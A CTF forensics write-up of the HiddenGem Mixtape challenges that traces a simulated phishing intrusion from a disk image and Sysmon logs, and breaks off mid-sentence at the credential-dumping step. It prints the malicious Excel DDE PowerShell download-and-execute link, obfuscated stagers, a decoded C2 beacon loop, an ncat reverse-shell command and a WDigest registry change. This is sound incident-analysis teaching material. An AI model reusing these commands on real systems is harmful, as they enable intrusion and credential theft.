# idek CTF 2022* Forensics - HiddenGem Mixtape Writeup This week is the Preliminary Eve in China, and most of my time is resting and partying. At the same time, there are some good challenges in idek CTF, among which I prefer the HiddenGem Mixtape series of challenges. Since I am a forensics enthusiast, and I I am also a malware analyst. So I prefer this challenge that is close to the realworld. Although some people may feel that this challenge is strange,guessing. Including some designs that may confuse the players. I hope my writeup can let you learn more much.Let's gooooo And a digression: szymex73 so strong! █Bquanman█ so strong! # HiddenGem Mixtape: After downloading the file, we got three files `2023-01-07T194857_HiddenGem.zip`,`Note.txt`,`HiddenGem.7z` `2023-01-07T194857_HiddenGem.zip` after decompression is `2023-01-07T194857_HiddenGem.vhdx` Note.txt: ``` Note 1: All flags are wrapped in idek{} format, you don't need to do it yourself. Note 2: The zip file is the same for all Mixtape. HiddenGem.pcapng is mainly for `HiddenGem Mixtape 3: The Ultimate Goal` however it may contain data for the rest of HiddenGem Mixtape. Note 3: Password for HiddenGem.pcapng will be released with Mixtape2 and 3 ``` `HiddenGem.7z` needs a password, which is the traffic package. The password is `94cjFEJdMrZ&YI)s94cjFEJdMrZ&YI)s` ## HiddenGem Mixtape 1: Initial Access: File `2023-01-07T194857_HiddenGem.vhdx` and find that it is ``` 2023-01-07T194857_HiddenGem.vhdx: Microsoft Disk Image eXtended, by .NET DiscUtils, sequence 0xe, NO Log Signature; region, 2 entries, id Metadata, at 0x200000, Required 1, id BAT, at 0x300000, Required 1 ``` First, I found the vhdx I got, but it seems that the direct analysis of autopsy failed because it modified some offsets or erased some information, so I used Diskgeniu to open the disk file first, and then restore the file system. Then take the logicfiles of Autopsy for analysis, the approximate effect is as follows: ![](https://i.imgur.com/XvXgQ6R.png) ![](https://i.imgur.com/qKS6Oaz.png) ### Email: Since `Initial Access` is mentioned in the title description, it can be imagined that there may be some initial implants, and autopsy's analysis indicates that there are email messages ![](https://i.imgur.com/c91cUUM.png) After extraction, the mail information is as follows, with the attached `Policy.7z` and the password `Privacy4411@2023!!!` ![](https://i.imgur.com/fo1SNJL.png) Save it as 7z and decompress it with a password to get Policy.xlsx, continue to analyze the xlsx file ### Policy.xlsx: After decompression, it can be observed that there are some xlsx in it. After checking that there is no template injection and CVE, you can refer to whether there is DDE. exists in `xl\externalLinks\externalLink1.xml` ``` <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"><ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\&quot;http://172.21.20.96/windowsupdate.ps1\&quot;);IEX $e"><ddeItems><ddeItem name="_xlbgnm.A1" advise="1"/><ddeItem name="StdDocumentName" ole="1" advise="1"/></ddeItems></ddeLink></externalLink> ``` Specifically, you can know that the command `cmd /c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://172.21.20.96/windowsupdate.ps1\");IEX $e` The commands to run powershell hidden and get content from `http://172.21.20.96/windowsupdate.ps1` and execute from `windowsupdate.ps1` you can also choose some online sandboxes to run and get the command like any.run: https://app.any.run/tasks/227c2a3f-8be3-443a-9a55-b4f5e8406e17 ![](https://i.imgur.com/KuMZVd9.png) (toooo easy,right?) ### Powershell: Through the clues we found above `http://172.21.20.96/windowsupdate.ps1`, but this is a private ip that cannot be accessed, and then put it in autopsy to search, and found that there are some log information in the subsequent stage ![](https://i.imgur.com/YKE79E3.png) Its log files are located under: `C:/Windows/System32/winevt/logs/` Extract the `Microsoft-Windows-Sysmon%4Operational.evtx` log and load it with `Event Log Explorer` ![](https://i.imgur.com/4UVwUri.png) You can get the follow-up payload from `windowsupdate.ps1`: ``` & ( $sHEllid[1]+$sheLLiD[13]+'X')( NEW-obJEct Io.cOMPReSSiON.DEFlAteStrEAM( [SyStem.iO.mEMOrySTream] [SysteM.cOnVerT]::FRomBase64STRINg( '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' ) , [sySteM.IO.ComprESsiON.cOmpresSiONMODe]::dEcomPrEss)|fOReach-OBJECt{NEW-obJEct iO.sTReAMrEAder( $_ , [TExT.EncOdiNg]::AscIi)} | fOREacH-obJeCt{$_.reADToend()}) ``` The payload can be observed. According to the analysis experience of powershell malicious samples, we can get `& ($sHellid[1]+$sheLLiD[13]+'X')` represents iex, so we only need to turn it into `echo` and then run it Get the next stage: ``` (New-OBJECT MAnAGeMent.AUtOmaTiON.PsCreDEntIAL ' ', ('76492d1116743f0423413b160 50a5345MgB8AHUAQgAxAEsAZQBQAE8AUQA4AHQAVAB5ADEAcwBXAFYALwBVADcAUAAyAGcAPQA9AHwA MQAzADcAMwAwAGIAOQA2ADMANQAwAGYAOABlADUAOQAxAGEAMgA4ADAAOQAzAGQAMABjADYAZgA2ADQ AOAAxAGYAZAA4AGUAMAA2ADIANABmADQAMgAzADMAYwAxAGQANgA4ADEANgAwADcANgA1AGYANgBjAG UAZQA1ADAAMwA4ADMAZQA5AGMAOQAzAGUAYgBhAGIANgA1ADEANQBjAGYAYwBiADIAOQA2ADcAYgA4A GEAZAA3AGYANABhAGYAYgA2ADgANQAyADkAOAA1ADUAYQA2ADkAMwAzADMANwBkADIAOQA1ADkAZgBh ADkANAA1AGYANwA1ADIAZAA2AGMAMgBhADYANQBjADAAYwA4AGEAYQA0AGYAZQBiAGUAYgA2AGQAOQA 4AGIAOAA1AGYAZAA1ADMANgBkADYANQBkADMAZQBiADAANQBjADkAMABmADMANQA0AGYAOQBiADMAMQ A2ADkAOQAyADcAZgA2ADcAZgBiADAAYQAxAGYANAAzAGIAYQBjADQANwA2ADgAYwA4ADYAOAA2ADcAY wA2ADAAZABkADkAOQAwADAAYgAzADYAMgA2ADUAZQA0AGYANAA2AGEAYgAwAGMAOAAwADAANQA4ADkA NQBlAGYAYwBhADkANAAwADEANgBkADgAMwAzAGEAYQBlADMAMgAxAGEAMQBiADAAMwAwADQANQA1ADQ AYQAzADIAYwA4AGQAZQBkADUAZABlAGIAMwA2ADgAYgA4AGYANAAyADUAZAAxADIAOAA0AGYANwA2AD cAMABjADMAOAA1ADMAMwAyADkAZQA2AGEANwBmADAAZAA2ADUAMwBkADkAYgAzADcAMgA4ADEAZAA2A GIANwAwADUAYwA0ADMAYQAwAGUAZgA0ADYAZQBiADkAYgA5ADcANQA5ADkAYQA0ADEAMgBhADQAYQA4 ADYAMQBhADIAYgA4ADcANwAzADIAMABjADIAMQA3ADgAYwA0ADIAYwA0ADYAZgAwAGIANQBmAGEAYQA 3AGIANQBlADMANgAwAGEANwAwAGMAMgBlADgAYQA5ADAAYwBlADkAMgBjADgAMgA3ADIAMAA4ADMANw BiAGQANAA1AGYAOQBlADQANABkADkAMgBiADAAZQBiADgAYgA4ADQAZQA2AGQANgBlADAAYgA5ADcAN QBhAGQAYQA2ADMAZgAwADcAMAA3ADcAYgA5AGYAYwAxADcANQBjADUANgAwAGMAZQA4ADYAZAA4ADkA ZABhADgAOQA1AGQAMQA5AGEAMQAzADUANgAxADUAMAAyAGQANgA2AGMAZQBmAGQAYwBlADUAMABiADA AYQA5ADIAOABlADMAZABkAGUANAAzADIAZgAwAGEANgA3ADkANQA3ADYANgA3ADIAOQBjAGUANgBkAD QAZAAwAGUAZAAwADgAZAA5ADQANgBlADYAMwAyADIANQAyADkANABmADgAYwA5ADkAMAA0AGQAZgBkA DEAYwAxAGUAOQAxADcAZgAyAGMANQBkAGYAMwAzADMANgBlAGEAZgBmAGMANgBjAGMAZABkAGQAMAA5 ADAAZQAzADQAZAAwADYAZAAyADUAMwA2AGMANgA2ADAANAAyADUANgA2ADUAYwA0ADQAZQAyADIAMgB mADAANQAyAGEAYwA5ADAAZAAzADYAZAAzAGYAYQA2AGEAOAA0ADIAOQAwADAAMQAwAGYAOQBhADAAMw BkAGYAMQBiAGMANgAwAGMAZAA4ADEANAA5AGEAMwAyAGQAOQBlADcANwBkADEAYQBiADUANQA0ADIAZ ABhADQANwBmADAAYQA2ADYAMAAyADEANABmADAAMgAyAGEAMQAxAGQANgBjADgAOQA2ADYAYgA1AGQA NQAwADIAMwBiADQANwAxADkAZgA5AGIANAA4AGQAYwAwADAANABiADIANgA2ADEAMwAwADIAYQA1ADI AOQA2ADgAOQBmADgANgAwAGUAYwAyAGUANwAyAGUANAA1AGEAZABhAGEAMgA5ADQAZQAxAGUAMgA0AD cAMQAzAGYANAAyADMAYQAzAGMAZgBlAGEANQA0ADQAYQBmADEAZAA1AGYANQBiADQANQA2ADgAZQBhA GYAZQA4ADYAYgBhADgAMgBjADAAZQBjADIAMQAyADQAMgAyADAANAA4ADAAMAAyAGIAMgBiAGQANwBj AGYAYQA3ADIAMABhAGMANgA1AGYAZgA4ADcAZQA2ADcANwA5AGQAMAA2AGEANgBlADkAZgA1AGIAOQA 0AGEAMwBiADAANgA4ADMAZAAwADQANQBkAGIAYwBmAGEANwBiADkAMAA1ADgAMABiAGYAYgA1AGEAMg AxAGUAMQA0ADgANgAzADgAYQAwADcANQBlADUAYgA5AGUAYgAxADQANQA2AGQAYgAzADEAZgA0AGQAZ QBiADMAZABlADIANQBiAGYANgA5AGUANQA5ADYAYgA4AGEAMgBjADcAYgA5ADUAOAAxAGMAZQAwADcA ZAAzADQAMwA0ADIAMwA5ADMAYQAyADUAMQBkADUAYgBlADQANABmADgAMgBiADYAMgA3ADgAYgAxAGM AMQBhAGMANQAyAGQANgBlADcANAA1AGYANAA5ADMAMAA5ADcANwBkAGIAMwA0AGUAYQBjADEANwAwAG UAZQBhADEAZQAzADUAZAA0ADIAYQBjADAAMQA2ADYAOABlADQAMAAxADcANwA4AGUAZABjADgAZAA5A GIAZQA0ADcANgBmADAANwBiADgAOAA4ADIAYgA4AGIAYwA2ADgAZQA3ADgAYQA2AGQAMwAzAGMAZQBl AGUANQAzADIAZQBkAGMAYQBhADkANwBhAGEAOAAwADEAZgA0ADEAMwAxADAAYwA2AGEAZgBmAGMAZgB lADEAYQA5ADcAOAAxADEAOQAwADEAYwBkADIAOQAwAGYANgBhADkAYwBlAGQAYQBmADYAYwBmADYAOA A1ADMAMAAxADQANgA2ADUAZABhADMAYgAwADEAZQAwADgAMwAxADMAMgA5ADYAOQA1AGYANAAwADgAO ABjAGYANABmAGEAMgAxADQAZQA3ADUAMgA2ADQAOABhAGMAYgBlADAAYgA2ADcAYwAyAGMAOQA0AGIA MwBlAGIANAAxADkAMwAyAGIAZQBhADMANQA4AGUAOQBkAGQANQA3AGUAYgAyADcAZABmADQAZQBiADQ AOQBmADQAMAA5AGEAOABhADYAOABhAGIAZQBlADAAYQA2ADUAZgA3ADEANQBkADIANABiADcAYwAxAG IANQAwADgAZQBlAGUAMQBjAGEANAA1ADYAMgBiAGYAMwA4ADAAMwBiADIAZgAwADAAYQAxADEAOAAwA DQAYgA3ADcAMwBhADEANABkAGQANQA1ADQAZgA1AGMAMAA5ADQAOQA0ADAAZgA3AGIAMwA3AGIAMwAx ADAAZQBjADQAYQA3ADYAMQBkADQAOQA3AGEAOABiAGYAZgBhAGMAZQAyADAAMgA3ADIAOQAxADIAZgB hADQAYwBhADkAYwA4ADAANwA0ADUANwAyADgAZQAzADUAMQBlADIAMgA1ADYAMAAwADAAOAAyAGIAYQ A4AGYAZQBiAGEAMAA3AGYAMgBjAGIANgBkAGMAZgAxAGIAYgA4ADEAMgA4ADAANQA3ADMANAA3ADcAO QA5AGUANQA2ADUAMQAwAGQANAA1AGYANQAyAGQAYwBiADUAZgAzADgAMABmADIANwAxAGMAZQBhAGYA OABiADUANQBiAGQAZgBkAGMAMABjAGIANwBjADAANAA5AGYAZABkADAAMgAwADAAYwA5ADcAYwA3ADQ ANwBkADQAYgAwAGYAZABkAGYAMwAzADUAZQAwADgAZAAyADIAYQA4ADQAOQBlADgAZgBjAGMAMgAzAD cANAAyADcAZgBhADMAZgA4ADUAMgBhADAANQAxADkAYgAyAGQAYwBjADQAOQA1ADUANwAwADUAYgA0A DgAOQBkADEAYwAzADgAMAA3ADUAOAA5AGEAYQBiADYAZQA5ADEAYQAxADMAMgBkADYAZAA5ADYAMQAz AGQAZAA2AGYANQAyAGQANgA1ADIAMAA5ADUAYgA2AGEAZQBjADkAMQBhAGIANQAyADUAMwA5ADQAMAA yADUAOQA0ADgAZgBmADgANAAwADYAMwBmAGIAMAA4AGQAZgA0ADUAYwAyAGQAOQAwADYANgA5ADkAOA BiAGYANAA1ADYAMQAyADUANQA1ADAAYwAzADUAYgAwAGQAMgA0ADUAZAA0AGUAYwAyAGYAMABkADAAO AA1ADgAYgA0ADcANAA1ADIAMAAwADIANwBlADYAYgA2ADUAOABlADMAYgA3ADYAYgBmAGQANQA2ADYA ZAAyADYAYwA4ADcANQAzADcAOABjAGMAMQBlADQANABmAGUAOQBhADUAYQBlADkAZABkAGMANQA2ADA AMQBmADYAMAAxADEAOQA3AGIAYwBiAGUANwA2ADIAZAA4ADkAYQA4AGEAMgBlAGQAMgA4ADQANAA4AD cANAA4AGEAYgA0AGIAMgA5ADgAOQBhAGUAMQAzADUAMwBkADMAMAA5ADMANQA1ADMAMQAyADEAYQBhA DkAOAA2ADgAOQBlAGEANwA2ADIANAA3ADgAOQAzAGEAYwA0ADkAYgBhAGMAMwBmAGQAZABiADYAZgA3 ADAAZABkADIAMQA3ADAAYQA4ADQAOQBlADYANgAxADkAYQA3ADMAMgA0ADgAOQA2ADcAOQBkADEAYQB mAGYANwAzADcAYgA0ADAANgAzADgAZAA1AGYAZgBkADgAOQBjAGIAZgA4ADYAOAAwADcAOQBkADYAMA AxADYAMgBmADcANAAwAGUAOAA4ADYANQAzAGYAMwA5ADMAZQAxADYAMgBmADIAZABjAGEAMAA3ADIAM AA1AGQAYQA5AGYAOABkADMAZAA2AGYAMgAxAGQAYwA0ADAAMgAwADMANQA4AGUAYQBiADYAMQBlAGQA MAA3ADcAYQBlADgAOQBiADEANQA1ADQAZAA1ADgAMQA3ADQAMwBjAGYANQAxAGUAMQAyAGIAZQBjADI AYgBmADIAZgBlADUANAA3ADQAYQA5ADAANwBjADQANgA0AGEAYQAwADMAZAA0AGEAZQA1AGMAZgAzAG MAYgBlAGEAZQA2ADQAMABiADQAMQBhAGEAZQA5ADcAYwAxADAAZQBiADYAMQAyAGMANQAwADUAMQBiA GQAMQBkADUANAAwADQAZQA1AGMANQAzAGUAOAA3ADYAYwA3AGUANwBjADQAZgAzAGMANwAyADgANwA1 ADQAOQBhADIAMwA1ADUAMgA2ADAANgA1ADYANwAwADcAMgBiAGUAYwA0ADYAOQA5ADQANgA5AGUAYgA 0ADQAMQBjADUAYwA4AGQAMgBjAGIAYQAxADIAMwA3ADYAYQBlAGUAZgA0ADIANgBlAGMAZgA0AGIANQ A3ADcAOAAyAGEAYwA2ADMAZQBiADcANgAxADgANABiADcAMgA5ADAAMgA2ADkAZgBlAGEANQBjADgAZ gA4AGEAYwBjAGIAMgBkAGYANAA4AGQAOABmADkANgBjAGIAOQA4AGUAOQBjAGMAMwA3ADcAYwAyAGQA ZQA2ADQAMwBkADYAMQA5AGIANwAyADYAZQA5ADcAYQA5ADQANQBkADEANgA0AGQANAA2AGQAZQBlADA AZgBlADUAMAAzADkAYwBlAGYAZgBhADQANwA1AGEAMQBkADMAOAA1ADkAMAA1AGIAMAAyADIAMQA1AD EAOQA2AGUAYgA0AGUAOAA1ADYAYgA4ADEAMAA1ADAAYQBlAGUAMgBlADYAYwBkAGEANQBiAGUANwAzA DMAZAA1ADAAZgBjADYAMwA5AGEANABlADEAMABmADUAMwA2ADgANQBjADUAYgA5AGIAYQA3AGEAMwA1 ADkANgBlADAAMgBiADYAZQA5AGEANgA0ADAAMAA0ADYAOABkAGMAMQAwADIAYwAzADgAOAAzAGIAMQB iADgAZgA1ADUAYQBmADIAZgBkAGMANAAzAGIANgA4AGUAOQBiADgANQBmADIAMAA5AGMAZAA1ADUAYg AyAGMAMwA4AGEAZABiADgAOAAwAGYANQBkADQAZgAzADkAYgA4AGYAOAA3ADIAYwAwAGUAMgAyADYAZ gAzADUAOQAzADgANQA3ADYAYwAyADAANQBlADEANwBlADEAZgBjADQAOAAwAGUAZQAyADIANABhADUA NwA4ADQAMwBiADIAZAA3ADYAYQBkADUANABhAGIAMwA1ADgANgA1AGYAYwAzAGEAYwA1ADAAMQA2ADg AZABlADMAYQA1AGEANwAxADQAMgBkAGQAZQA4AGMANwA5ADcAYgAzADUANwA3AGYAMgA5ADYAMgBlAD cAOQA3AGUAYgBmAGUAMgBiAGIAMwA0ADkAOQAyADcAMwBlADgAZQBmADMAOAAxADUAMwA1ADcANABiA DMAMABmADkAMgA3AGMAOAA5AGMANABlAGQAZQA3AGIAYQA2AGYANABkADAAMgBiADYAMgAyADQAZABl AGYANwBhADQAMAAxADMAYgBjADMAYwBjADkAZQBhADcANgBhADMAOAA0AGYAMwAwAGYAOQBmADUAOAB lADgAZAAwADgANAAzADAANABlAGEAMwAyAGMAZAAzADgAYgA2ADUAMgBmAGQAMwBjADgANwBhADkAMw AxAGUAMABiADQAMwAzAGIAOAA1AGUAMwAzADEAYgBlAGMAMQBiAGYAYgBmAGIANAAzAGUANwBjAGMAM wAxADMAYwAwAGYAMQBlADAAZgBmAGEAOAAyADEANgA4ADgAMwA3ADMANgA5AGQAMgA2AGEAZAA1ADYA YwBmAGYANgAxADAAOAA3AGQAMwAyADYAMQBlADgAMgAzAGMAOAAxADkAMwBhADYANwA3ADcAYQA3ADM AYgAwAGMAMAA2AGEANwBiAGMAZABmADIAZQBjADUAYwAxADYAMABhAGUANQBlADAAZgA2ADMAOAA3AD EANgA0ADEAOAA1ADUAMgAzADUAYQA5ADMANQA0AGMAOABiADAAMgAwAGQAMgAyAGIANQBmADQAOQBhA DQAYQAwADMAZAAxADkAMwAyADQAYgBkADUAMwAzADAANAAxADMAMwAxAGYANwAzADYAMgA1AGYAYwBh AGIAMQA2ADYANgBjAGQANgAwAGIANABkADYAOABhAGQAMQAzADEAMAA4AGYAYwBhAGUAOAA0ADYAYQA yAGMAOAA1AGUAMQA3ADgAOABiAGYANwBjAGMAZQAyADcAZgA1ADAAZQBiAGQAYQAwAGQAOAAyADQANA BjADIAYQA4ADMAYQBkADIAOAAxAGUANgBiADMANABlADMAZABiADMAMQA1ADcANABjADEAZQBjAGUAZ AAyAGIAMgA4ADEAYwBiADgAMgAwAGEAZgAzADUANgAyAGYAMwA3ADIANABmADkAOAA5ADcANwBiADUA NQAzAGYAMgA=' |ConvERTtO-SecureSTRiNG -k 55,113,158,254,51,94,175,13,94,42,226, 159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93)).Getn eTwoRKCrEDEnTIAl().pASsWoRD |. ( $PsHoME[21]+$psHOme[34]+'x') ``` here `.($PsHoME[21]+$psHOme[34]+'x')` is IEX, replace it with `Out-String` and run again, then you can get the decryption and format it: ``` $bwqvRnHz99 = (104,116,116,112,115,58,47,47,112,97,115,116,101); $bwqvRnHz99 += (98,105,110,46,99,111,109,47,104,86,67,69,85,75,49,66); $flag = [System.Text.Encoding]::ASCII.GetString($bwqvRnHz99); $s='172.21.20.96:8080'; $i='eef8efac-321d465e-e9d053a7'; $p='http://'; $v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/eef8efac -Headers @{ X-680d-47e8"=$i };while ($true){ $c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/321d465e -Headers @{ "X-680d-47e8"=$i} ).Content; if ($c -ne 'None') { $r=iex $c -ErrorAction Stop -ErrorVariable e; $r=Out-String -InputObject $r; $t=Invoke-WebRequest -Uri $p$s/e9d053a7 -Method POST -Headers @{ "X-680d-47e8"=$i } -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ') } sleep 0.8 } ``` ### flag1: Observe the part where the flag exists Run that piece of code to get https://pastebin.com/hVCEUK1B to visit again: ``` PS $bwqvRnHz99 = (104,116,116,112,115,58,47,47,112,97,115,116,101); PS $bwqvRnHz99 += (98,105,110,46,99,111,109,47,104,86,67,69,85,75,49,66); PS $flag = [System.Text.Encoding]::ASCII.GetString($bwqvRnHz99) PS $flag https://pastebin.com/hVCEUK1B idek{MS_ExCel_DyN4m1c_D4ta_ExcH@ng3_1s_3a5y_t0_d3teCt} Resource: https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within ``` then You can get the flag --> `idek{MS_ExCel_DyN4m1c_D4ta_ExcH@ng3_1s_3a5y_t0_d3teCt}` ## HiddenGem Mixtape 2: Credential Access: According to the above clues, we already know some news, including `http://172.21.20.96/windowsupdate.ps1` However, in the subsequent log retrieval, I did not find the payload after interacting with `172.21.20.96:8080`, but the information exists in `C:/Windows/System32/winevt/logs/Microsoft-Windows-Sysmon%4Operational.evtx` Retrieve the log to locate a specific statement ![](https://i.imgur.com/lKTCJ4E.png) It can be seen that the parent process is EXCEL.exe and its child process is cmd.exe, and the child process of cmd is the command of powershell, which conforms to the example of running powershell with xlsx and DDE described above. After accepting the relevant configuration of C2, C2 uploaded an ncat to `C:\Users\IEUser\AppData\Local\Temp\SecurityUpdate.exe` of the target machine, and passed the command `"C:\Users\IEUser\AppData\Local\ Temp\SecurityUpdate.exe" 172.21.20.96 4444 -e cmd.exe` to reverse shell ![](https://i.imgur.com/57buYor.png) execute shell (cmd.exe) ![](https://i.imgur.com/7WsltHt.png) ### Ncat: Continuing to search upwards, we found that the cmd as the main process executed some commands to detect or collect some relevant credentials Execute `whoami`: ![](https://i.imgur.com/p0uCe3H.png) Execute `arp -a`: ![](https://i.imgur.com/BxFKJNZ.png) Execute `ipconfig /all`: ![](https://i.imgur.com/VvpHFOj.png) Execute `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1` to prepare for dump lsass ![](https://i.imgur.com/uq7CgO8.png) Afterwards, UpdateAgent.exe (procdump) and mimikatz.exe should be uploaded to `C:\Windows\System32\` through powershell, but I didn’t find the local related logs. If anyone finds them, please let me know. ### procdump && mimikatz: Execute 